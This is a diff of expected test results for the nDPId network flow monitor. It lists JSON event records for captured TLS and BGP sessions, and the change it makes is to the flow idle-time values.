00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-data-len":8517,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1581153184491}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 46/46

16
test/results/443-safari.pcap.out
View File

@@ -1,13 +1,13 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-safari.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109359601}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109359601,"flow_last_seen":1581109359601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109359601,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"}
00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109359601,"flow_last_seen":1581109359601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109359601,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"}
00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":41,"packets-processed":41,"total-skipped-flows":0,"total-l4-data-len":17203,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109360696}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 41/41

12
test/results/BGP_Cisco_hdlc_slarp.pcap.out
View File

@@ -1,11 +1,11 @@
00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1445156939131}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1445156939131,"flow_last_seen":1445156939131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1445156939131,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="}
00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1445156939131,"flow_last_seen":1445156939131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1445156939131,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="}
00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-data-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1445156989230}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 14/14

8
test/results/BGP_redist.pcap.out
View File

@@ -2,10 +2,10 @@
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1256636836167}
00187{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":104,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","protocol":34887,"global_ts_msec":1256636836167}
00503{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":163,"pkt_type":34887,"pkt_l3_offset":4,"pkt_l4_offset":0,"pkt_len":163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"DwCIRwABLf5FwACbk8xAAP8G2sQCAgICBAQEBACz+C\/VqGxJPJL2UFAYP7QOoQAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/wBzAgAAAFxAAQECQAIAgAQEAAAAVkAFBAAAAGTAECAAAgBkAAAEVwAFAAAAAQIAgAAAAAAAAwCAAawQAgEAAIAOIQABgAwAAAAAAAAAAAICAgIAeAABkQAAAGQAAABkqgAAAA=="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3}
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"}
00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
